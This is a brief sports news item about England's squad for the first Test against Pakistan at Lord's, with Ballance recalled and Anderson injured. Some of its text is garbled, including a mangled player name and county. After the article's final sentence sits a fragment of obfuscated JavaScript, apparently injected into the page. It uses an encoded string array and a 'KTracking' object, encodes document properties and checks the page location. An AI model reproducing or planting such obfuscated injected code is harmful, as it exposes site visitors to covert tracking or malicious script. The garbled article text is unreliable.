Yorkshire batsman Gary Ballance has been recalled into the England team for the first test against Pakistan which is set to take place at Lord’s in the next week but fast bowler James Anderson will miss out on the match owing to a shoulder injury.
Two others who will compete for a place in the 12-man squad are seamer Roland-Jones Ball from Middlesec and Jake Ball of Nottinghamshire.
The 26-year old Ballance has been called in as a replacement for Nick Compton who is taking a break from the game.
Two other players to be left out of the team are Ben Stokes and batsman Jos Buttler who powered the team to a win in the recent T20 against Sri Lanka.
The Lord’s test begins on July 14. xb322[18]](_0xb322[17])[0][_0xb322[16]](s)};if(document[_0xb322[11]][_0xb322[19]]=== _0xb322[20]&& KTracking[_0xb322[22]][_0xb322[21]](_0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12])=== -1){alert(_0xb322[23])}
